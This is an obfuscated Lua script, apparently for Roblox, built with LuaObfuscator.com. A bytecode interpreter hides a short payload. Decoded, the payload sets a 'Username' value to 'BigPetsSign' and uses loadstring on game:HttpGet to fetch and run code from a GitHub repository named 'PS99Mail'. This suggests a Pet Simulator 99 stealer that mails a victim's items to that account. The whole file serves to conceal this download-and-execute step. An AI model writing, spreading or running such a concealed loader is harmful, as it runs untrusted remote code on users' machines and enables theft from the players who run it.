--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v83,v19);v19=nil;v98=1;end end else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=(v31/((5 -3)^(v32-((1638 -(1523 + 114)) -0))))%((4 -(2 + 0))^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v85-(v85%(569 -(367 + 201))) ;end end else local v86=(929 -(214 + (1015 -302)))^(v32-(1 + (1065 -(68 + 997)))) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=(282 + 988) -((1183 -(892 + 65)) + 1044) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + 0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23()local v38=0 -(0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==(351 -(87 + 263))) then return (v42 * (16777396 -((120 -53) + 113))) + (v41 * 65536) + (v40 * (137 + 51 + 68)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;v38=953 -(802 + 150) ;end end end local function v24()local v43=v23();local v44=v23();local v45=(318 + 680) -(915 + 82) ;local v46=(v20(v44,2 -1 ,10 + 2 + (780 -(201 + 571)) ) * (2^(41 -9))) + v43 ;local v47=v20(v44,21,1218 -(1069 + 118) );local v48=((v20(v44,(502 -(44 + 386)) -40 )==(1 -0)) and  -1) or (1 + 0) ;if (v47==0) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else v47=792 -(368 + 423) ;v45=(1138 -(116 + 1022)) -0 ;end elseif (v47==(2065 -(10 + 8))) then return ((v46==(0 -0)) and (v48 * ((443 -(416 + 26))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(440 + 583) ) * (v45 + (v46/((3 -1)^((1976 -(998 + 488)) -(145 + 293))))) ;end local function v25(v49)local v50=0 -0 ;local v51;local v52;while true do if (2==v50) then v52={};for v89=1 + 0 , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=10 -7 ;end if (v50==1) then v51=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;v50=861 -(814 + (79 -34)) ;end if (v50==(7 -4)) then return v6(v52);end if (v50==(0 + 0)) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=886 -((1341 -(1020 + 60)) + 624) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=1409 -(450 + 959) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((1992 -(582 + 1408))~=v53) then else v58=nil;v59=nil;v53=3;end if (v53~=(0 -0)) then else v54=0;v55=nil;v53=1;end if (3==v53) then v60=nil;while true do local v91=0 -0 ;while true do if (v91~=(3 -2)) then else if (2==v54) then local v100=0;while true do if (v100==(1824 -(1195 + 629))) then for v125=1 -0 ,v23() do local v126=241 -(187 + 54) ;local v127;while true do if (v126==0) then v127=v21();if (v20(v127,781 -(162 + 618) ,1)~=(0 + 0)) then else local v161=0 + 0 ;local v162;local v163;local v164;local v165;local v166;while true do if (v161==(0 -0)) then v162=0;v163=nil;v161=1 -0 ;end if (v161~=1) then else v164=nil;v165=nil;v161=1 + 1 ;end if (v161~=2) then else v166=nil;while true do if (v162==2) then while true do if (v163~=2) then else local v177=1636 -(1373 + 263) ;local v178;local v179;while true do if (v177~=(1001 -(451 + 549))) then else while true do if (v178==(0 + 0)) then v179=0;while true do if (1==v179) then v163=3;break;end if (v179~=(0 -0)) then else local v190=0 -0 ;local v191;while true do if (v190~=(1384 -(746 + 638))) then else v191=0;while true do if (v191~=(0 + 0)) then else local v195=0 -0 ;while true do if (v195~=(342 -(218 + 123))) then else v191=1;break;end if ((1581 -(1535 + 46))==v195) then if (v20(v165,1 + 0 ,1)~=1) then else v166[2]=v60[v166[1 + 1 ]];end if (v20(v165,2,562 -(306 + 254) )~=(1 + 0)) then else v166[5 -2 ]=v60[v166[3]];end v195=1;end end end if (v191~=1) then else v179=1;break;end end break;end end end end break;end end break;end if (v177==0) then v178=0;v179=nil;v177=1;end end end if (v163==1) then local v180=0;local v181;local v182;while true do if (1==v180) then while true do if (v181==(1467 -(899 + 568))) then v182=0 + 0 ;while true do if (v182==(0 -0)) then v166={v22(),v22(),nil,nil};if (v164==0) then local v192=1456 -(282 + 1174) ;local v193;while true do if (v192~=0) then else v193=811 -(569 + 242) ;while true do if (v193~=0) then else v166[8 -5 ]=v22();v166[4]=v22();break;end end break;end end elseif (v164==1) then v166[3]=v23();elseif (v164==(1 + 1)) then v166[3]=v23() -(2^16) ;elseif (v164==3) then local v199=0;local v200;local v201;while true do if (v199==(1024 -(706 + 318))) then v200=1251 -(721 + 530) ;v201=nil;v199=1272 -(945 + 326) ;end if (1==v199) then while true do if (v200~=0) then else v201=0;while true do if (v201==(0 -0)) then v166[3 + 0 ]=v23() -(2^(716 -(271 + 429))) ;v166[4]=v22();break;end end break;end end break;end end end v182=1 + 0 ;end if (v182~=(1501 -(1408 + 92))) then else v163=2;break;end end break;end end break;end if (v180~=(1086 -(461 + 625))) then else v181=1288 -(993 + 295) ;v182=nil;v180=1 + 0 ;end end end if (v163==(1171 -(418 + 753))) then local v183=0;while true do if (v183~=(0 + 0)) then else v164=v20(v127,1 + 1 ,3);v165=v20(v127,4,2 + 4 );v183=1;end if (1~=v183) then else v163=1 + 0 ;break;end end end if (v163~=3) then else if (v20(v165,3,532 -(406 + 123) )==1) then v166[4]=v60[v166[1773 -(1749 + 20) ]];end v55[v125]=v166;break;end end break;end if ((0 + 0)==v162) then local v174=0;while true do if ((1323 -(1249 + 73))~=v174) then else v162=1 + 0 ;break;end if (v174==0) then v163=1145 -(466 + 679) ;v164=nil;v174=1;end end end if (v162==1) then local v175=0;local v176;while true do if (v175~=(0 -0)) then else v176=0 -0 ;while true do if (v176==(1900 -(106 + 1794))) then v165=nil;v166=nil;v176=1 + 0 ;end if (v176~=(1 + 0)) then else v162=2;break;end end break;end end end end break;end end end break;end end end for v128=2 -1 ,v23() do v56[v128-1 ]=v28();end v100=2 -1 ;end if (1~=v100) then else return v58;end end end break;end if (v91~=0) then else if (v54==0) then v55={};v56={};v57={};v58={v55,v56,nil,v57};v54=1;end if (v54==(1428 -(41 + 1386))) then local v101=0;local v102;while true do if ((103 -(17 + 86))==v101) then v102=0;while true do if (v102~=(2 + 0)) then else v54=2;break;end if (v102~=(1 -0)) then else local v151=0 -0 ;while true do if (v151~=1) then else v102=2;break;end if (v151~=0) then else for v168=1,v59 do local v169=0;local v170;local v171;local v172;local v173;while true do if (v169~=(167 -(122 + 44))) then else v172=nil;v173=nil;v169=2;end if (v169~=2) then else while true do if ((0 -0)~=v170) then else v171=0 -0 ;v172=nil;v170=1;end if (v170==1) then v173=nil;while true do if ((1 + 0)==v171) then if (v172==1) then v173=v21()~=0 ;elseif (v172==(1 + 1)) then v173=v24();elseif (v172~=(5 -2)) then else v173=v25();end v60[v168]=v173;break;end if (v171~=(65 -(30 + 35))) then else local v186=0 + 0 ;while true do if (v186~=(1257 -(1043 + 214))) then else local v189=0 -0 ;while true do if (0~=v189) then else v172=v21();v173=nil;v189=1213 -(323 + 889) ;end if (v189~=(2 -1)) then else v186=581 -(361 + 219) ;break;end end end if (v186==(321 -(53 + 267))) then v171=1 + 0 ;break;end end end end break;end end break;end if (0~=v169) then else v170=413 -(15 + 398) ;v171=nil;v169=1;end end end v58[985 -(18 + 964) ]=v21();v151=1;end end end if (v102==(0 -0)) then local v152=0;while true do if (v152==(0 + 0)) then v59=v23();v60={};v152=1 + 0 ;end if (v152==1) then v102=1;break;end end end end break;end end end v91=851 -(20 + 830) ;end end end break;end if (v53==1) then v56=nil;v57=nil;v53=2;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v88=0;while true do if (v88==1) then if (v80<=5) then if (v80<=2) then if (v80<=0) then v77[v79[2]]=v79[3];elseif (v80==1) then local v130=v79[2];local v131=v77[v79[3]];v77[v130 + 1 ]=v131;v77[v130]=v131[v79[4]];else do return;end end elseif (v80<=3) then for v121=v79[2],v79[3] do v77[v121]=nil;end elseif (v80>4) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end else v77[v79[2]]();end elseif (v80<=8) then if (v80<=6) then v63[v79[3]]=v77[v79[2]];elseif (v80==7) then v71=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=9) then local v107;local v108,v109;local v110;local v111;v63[v79[3]]=v77[v79[2]];v71=v71 + 1 ;v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;v79=v67[v71];if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end v71=v71 + 1 ;v79=v67[v71];v111=v79[2];v110=v77[v79[3]];v77[v111 + 1 ]=v110;v77[v111]=v110[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v111=v79[2];v108,v109=v70(v77[v111](v13(v77,v111 + 1 ,v79[3])));v72=(v109 + v111) -1 ;v107=0;for v123=v111,v72 do local v124=0;while true do if (v124==0) then v107=v107 + 1 ;v77[v123]=v108[v107];break;end end end v71=v71 + 1 ;v79=v67[v71];v111=v79[2];v77[v111]=v77[v111](v13(v77,v111 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];v71=v79[3];elseif (v80==10) then local v142=0;local v143;while true do if (v142==0) then v143=v79[2];v77[v143]=v77[v143](v13(v77,v143 + 1 ,v72));break;end end else local v144=v79[2];local v145,v146=v70(v77[v144](v13(v77,v144 + 1 ,v79[3])));v72=(v146 + v144) -1 ;local v147=0;for v148=v144,v72 do v147=v147 + 1 ;v77[v148]=v145[v147];end end v71=v71 + 1 ;break;end if (v88==0) then v79=v67[v71];v80=v79[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030B3O00426967506574735369676E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00124O00014O0003000100013O0026083O0002000100010004073O0002000100122O000100013O00260800010005000100010004073O0005000100122O000200033O001209000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000300056O00023O00024O00020001000100044O001400010004073O000500010004073O001400010004073O000200012O00023O00017O00",v9(),...);
